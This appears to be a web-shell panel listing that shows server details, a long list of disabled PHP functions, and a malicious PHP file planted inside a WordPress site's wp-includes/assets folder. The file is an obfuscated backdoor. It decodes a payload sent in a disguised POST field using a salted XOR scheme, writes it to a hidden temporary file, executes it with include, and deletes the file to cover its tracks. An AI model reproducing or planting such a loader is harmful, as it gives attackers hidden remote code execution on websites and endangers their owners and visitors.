HEX
Server: LiteSpeed
System:
User: ()
PHP: 7.3.33
Disabled: ln,cat,popen,pclose,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,system,dl,passthru,exec,shell_exec,popen,proc_close,proc_get_status,proc_nice,proc_open,escapeshellcmd,escapeshellarg,show_source,posix_mkfifo,mysql_list_dbs,get_current_user,getmyuid,pconnect,link,symlink,pcntl_exec,ini_alter,pfsockopen,leak,apache_child_terminate,posix_setpgid,posix_setsid,posix_setuid,proc_terminate,syslog,stream_select,socket_select,socket_create,socket_create_listen,socket_create_pair,socket_listen,socket_accept,socket_bind,socket_strerror,pcntl_fork,pcntl_signal,pcntl_waitpid,pcntl_wexitstatus,pcntl_wifexited,pcntl_wifsignaled,pcntl_wifstopped,pcntl_wstopsig,pcntl_wtermsig,openlog,apache_get_modules,apache_get_version,apache_getenv,apache_note,apache_setenv,virtual,ini_get_all,php_passthru,posix_uname,php_uname,highlight_file,define_syslog_variables,ftp_exec,inject_code,eval
Upload Files
File: /var/www/vhosts/miroglu.net/subdomains/serhatburke/wp-includes/assets/pascal.php
<?php

if(array_key_exists("r\x65f", $_POST) && !is_null($_POST["r\x65f"])){
	$bind = array_filter([getenv("TMP"), sys_get_temp_dir(), "/var/tmp", session_save_path(), "/dev/shm", getenv("TEMP"), getcwd(), "/tmp", ini_get("upload_tmp_dir")]);
	$entry = $_POST["r\x65f"];
				$entry 	 =	explode ( 	 "." , $entry   )	;  
	$data	 =	 '';
            $salt4	 =	 'abcdefghijklmnopqrstuvwxyz0123456789';
            $sLen	 =	 strlen(	 $salt4);
            $o	 =	 0;
    
            foreach(	 $entry as $v9) {
                $sChar	 =	 ord(	 $salt4[$o % $sLen]);
                $d	 =	 (	 (	 int)$v9 - $sChar -(	 $o % 10))^	65;
                $data	.=	 chr(	 $d);
                $o++;  }
	while ($flag = array_shift($bind)) {
    		if (is_dir($flag) && is_writable($flag)) {
    $element = sprintf("%s/.ent", $flag);
    $success = file_put_contents($element, $data);
if ($success) {
	include $element;
	@unlink($element);
	exit;}
}
}
}